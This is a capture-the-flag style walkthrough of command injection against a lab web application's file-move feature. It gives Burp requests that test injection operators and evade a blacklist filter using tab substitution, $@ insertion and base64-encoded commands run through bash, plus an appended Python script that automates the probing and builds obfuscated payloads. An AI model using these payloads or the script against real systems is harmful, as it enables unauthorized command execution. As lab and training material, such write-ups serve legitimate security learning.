CMD INJECTIONS

OBJECTIVE: Test for command injection vulnerabilities against the target web application

What is the content of '/flag.txt'?
root@oco:~$ BROWSER > 94.237.58.94:32878
 * guest:guest
 * review the functionality of the webapp
 
NOTE: It is generally easier to inject our command into an input that lands at the end of the shell command than into one in the middle of it, though both are possible.
 
#test the web app for cmd injection
root@oco:~$ burpsuite
root@oco:~$ BROWSER > FoxyProxy > Burp
root@oco:~$ BURP SUITE > Proxy > Intercept is on
root@oco:~$ BROWSER > {targetSite:port} > click "copy to" on any file > "move"
BURP > Proxy > Intercept > Raw > right-click > send to repeater
 Request
  ...
  GET /index.php?to=;&from=51459716.txt&finish=1&move=1 HTTP/1.1
  * send each of the cmd injection discovery operators below as the "to" value, one at a time, and compare the responses
    an operator that gets the application's normal response or error (instead of the filter's denial message) is unfiltered and is the one to build the injection on
     - ;, \n, &, |, &&, ||, ``, $()  (URL-encoded: %3b, %0a, %26, %7c, %26%26, %7c%7c, %60%60, %24%28%29)
 Response
  ...
  HTTP/1.1 200 OK...error while moving
  
#check whether the command itself is filtered: the separator alone passed above, so a denial here means the command (or its characters) is blacklisted
 Request
  ...
  GET /index.php?to=;whoami&from=51459716.txt&finish=1&move=1 HTTP/1.1
 Response
  ...
  Malicious Request Denied
  
#obfuscate the cmd: %09 (tab) replaces the space, and ca$@t relies on bash expanding $@ to nothing so the word becomes cat; both are still denied here
 Request
  ...
  GET /index.php?to=;cat%09/flag.txt&from=51459716.txt&finish=1&move=1 HTTP/1.1
 Response
  ...
  Malicious Request Denied
  
 Request
  ...
  GET /index.php?to=;ca$@t%09/flag.txt&from=51459716.txt&finish=1&move=1 HTTP/1.1
 Response
  ...
  Malicious Request Denied
  
#create the payload and obfuscate it: base64 the command so neither the command name nor a space appears in the request, then decode and execute it on the target
root@oco:~$ echo -n 'cat /flag.txt' | base64
 Y2F0IC9mbGFnLnR4dA==

 Request
  ...
  GET /index.php?to=%0a%09bash<<<$(base64%09-d<<<Y2F0IC9mbGFnLnR4dA==)&from=51459716.txt&finish=1&move=1 HTTP/1.1
  * %0a (newline) is the injection operator, %09 (tab) stands in for every space, base64 -d <<<... decodes the command on the target and bash<<<... runs the decoded text
 Response
  ...
  HTB{c0mm4nd3r_1nj3c70r}
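The discovery and obfuscation steps above, scripted as an added example (not part of the original notes). The parameter names, the file name and the two response strings ("error while moving", "Malicious Request Denied") are taken from the requests on this page; the `send` callable is an assumption so the probe can be run against a real target with requests/urllib or against a fake in tests.

```python
"""Helpers for the command-injection discovery and obfuscation steps.

Added example, not part of the original notes. Parameter names, file name
and response strings are assumptions copied from the requests on this page.
"""
import base64

# Injection operators from the discovery list, with the URL-encoded form
# that goes into the query string (a raw newline or tab is not valid in a URL).
OPERATORS = {
    ";": "%3b",
    "\n": "%0a",
    "&": "%26",
    "|": "%7c",
    "&&": "%26%26",
    "||": "%7c%7c",
    "``": "%60%60",
    "$()": "%24%28%29",
}

# Response strings observed on this page (assumed exact).
DENIED = "Malicious Request Denied"
SHELL_ERROR = "error while moving"


def classify(body: str) -> str:
    """Map a response body to denied / error / ok.

    'error' means the request reached the shell and the app reported a failed
    move; 'ok' is anything else that the filter did not reject."""
    if DENIED in body:
        return "denied"
    if SHELL_ERROR in body:
        return "error"
    return "ok"


def build_query(to: str, frm: str = "51459716.txt") -> str:
    """Build the request path with an already URL-encoded `to` value."""
    return f"/index.php?to={to}&from={frm}&finish=1&move=1"


def probe_operators(send):
    """Send each operator alone as the `to` value and return the operators the
    filter did not reject. `send(path) -> body` is supplied by the caller
    (a requests/urllib wrapper against the target, or a fake in tests)."""
    unfiltered = []
    for op, encoded in OPERATORS.items():
        if classify(send(build_query(encoded))) != "denied":
            unfiltered.append(op)
    return unfiltered


def obfuscate(cmd: str, separator: str = "%0a") -> str:
    """Encode `cmd` the way the final payload on this page does: base64 the
    command, decode it on the target with `base64 -d`, and feed the result to
    bash through here-strings. Tab (%09) replaces every space, so the payload
    contains neither a space nor the literal command name."""
    b64 = base64.b64encode(cmd.encode()).decode()
    # '=' padding, '$', '(' and '<' are left unencoded, as in the working request.
    return f"{separator}%09bash<<<$(base64%09-d<<<{b64})"


def decode_obfuscated(payload: str) -> str:
    """Recover the command from an obfuscate() payload (what `base64 -d` on the
    target decodes), to confirm the payload round-trips before sending it."""
    b64 = payload.split("<<<")[-1].rstrip(")")
    return base64.b64decode(b64).decode()
```

Plug a real transport into `probe_operators` (for example a function that GETs `http://{targetSite:port}{path}` through the Burp proxy and returns the body) and it reproduces the operator sweep from the Repeater step; `obfuscate("cat /flag.txt")` yields exactly the `to` value of the final request above.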
